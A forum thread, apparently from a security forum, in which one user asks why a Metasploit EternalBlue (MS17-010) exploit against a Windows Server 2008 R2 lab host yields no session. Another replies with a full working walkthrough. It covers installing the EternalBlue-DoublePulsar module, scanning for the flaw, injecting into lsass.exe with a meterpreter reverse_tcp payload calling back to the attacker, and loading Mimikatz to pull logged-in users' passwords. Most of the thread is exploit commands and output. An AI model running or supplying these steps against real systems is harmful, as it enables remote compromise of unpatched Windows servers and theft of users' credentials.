I have this problem with windows/smb/ms17_010_eternalblue

[Ali_Sedaghat]

I have this problem with windows/smb/ms17_010_eternalblue

Attaker OS: Kali Linux 2019.2 x32 ---> 192.168.15.101
metasploit v5.0.41-dev
Victim OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (x64) ---> 192.168.15.102
Port 445 is Open & Vulner

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.15.102
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.15.101
set lport 4444
exploit

[] Started reverse TCP handler on "192.168.15.101:4444"
[] "192.168.15.102:445" - Connecting to target for exploitation.
[+] "192.168.15.102:445" - Connection established for exploitation.
[] "192.168.15.102:445" - Trying exploit with 12 Groom Allocations.
[] "192.168.15.102:445" - Sending all but last fragment of exploit packet
[] "192.168.15.102:445" - Starting non-paged pool grooming
[+] "192.168.15.102:445" - Sending SMBv2 buffers
[+] "192.168.15.102:445" - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] "192.168.15.102:445" - Sending final SMBv2 buffers.
[] "192.168.15.102:445" - Sending last fragment of exploit packet!
[] "192.168.15.102:445" - Receiving response from exploit packet
[] "192.168.15.102:445" - Sending egg to corrupted connection.
[-] "192.168.15.102:445" - Errno::ECONNRESET: Connection reset by peer
[] Exploit completed, but no session was created.

Please help me.
Thanks.

 

[Vertigo]

I have this problem with windows/smb/ms17_010_eternalblue

Hello,Bro.
If the version is not patched,then :
> use exploit/windows/smb/eternalblue_doublepulsar
> info
> options
> set DOUBLEPULSARPATH /root/deps
> set PROCESSINJECT lsass.exe
> set TARGETARCHITECTURE x64
>options
> set PAYLOADS windows /x64/meterpreter/reverse_tcp
>set LHOST IP (your)
>set RHOST IP (target)
> show targets
> set target (number)
> exploit

But if the target is protected,then it won’t help.
This is an outdated attack))

 

[Sedaghat]

Hello,Bro.
If the version is not patched,then :
> use exploit/windows/smb/eternalblue_doublepulsar
> info
> options
> set DOUBLEPULSARPATH /root/deps
> set PROCESSINJECT lcass.exe
> set TARGETARHITECTURE x64
>options
> set PAYLOADS windows /x64/meterpreter/reverse_tcp
>set LHOST IP (your)
>set RHOST IP (target)
> show targets
> set target (number)
> exploit

But if the target is protected,then it won’t help.
This is an outdated attack))

Thanks Bro.
I'll post two photos to make sure Target has a bug.
But I still can't use this bug.

Ссылка скрыта от гостей

Ссылка скрыта от гостей

 

[Vertigo]

Thanks Bro.
I'll post two photos to make sure Target has a bug.
But I still can't use this bug.

Good to see you again
I looked at the photo
There are some errors in the photo

See step by step
Previously, the module was not in the Metasploit, so it was installed separately
1) download the exploit

# git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

2) After copying is complete, we get a module eternalblue_doublepulsar on ruby and a directory deps

# ls -alh /opt/Eternalblue-Doublepulsar-Metasploit/

Next, we created the directories and put the module in them.
This protects the module from being overwritten and updated Metasploit.
This way:

# ls -alh /root/.msf4/modules/exploits/windows/smb/eternalblue_doublepulsar.rb

The directory deps can also be copied to the current user directory:

# ls /root/deps

3) You began to scan the target correctly for this vulnerability:

# msfconsole
> search ms17_010
> use auxiliary/scanner/smb/smb_ms17_010
> set RHOSTS IP target (or subnet)
> run

If the target is vulnerable guaranteed, then we will see the value:
"Host is likely VULNERABLE to MS17-010!"
And a question mark at the beginning of the line, not a plus.[!]

4) Now, for the attack Windows server 2008R2, we will use our installed module:

> use exploit/windows/smb/eternalblue_doublepulsar
> options
> set DOUBLEPULSARPATH /root/deps
> set ETERNALBLUEPATH /root/deps
> set PROCESSINJECT lsass.exe
> set TARGETARCHITECTURE x64
> options
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> set LHOST IP (your)
> set RHOST IP (target)
> show targets
> set target 8 (or 9)
> exploit

And should get a session

> sysinfo
> getuid

If everything went well, we can forward Mimikatz it to memory:

> load mimikatz
And extract logins with passwords of connected users:
> wdigest

Hope this helps you Bro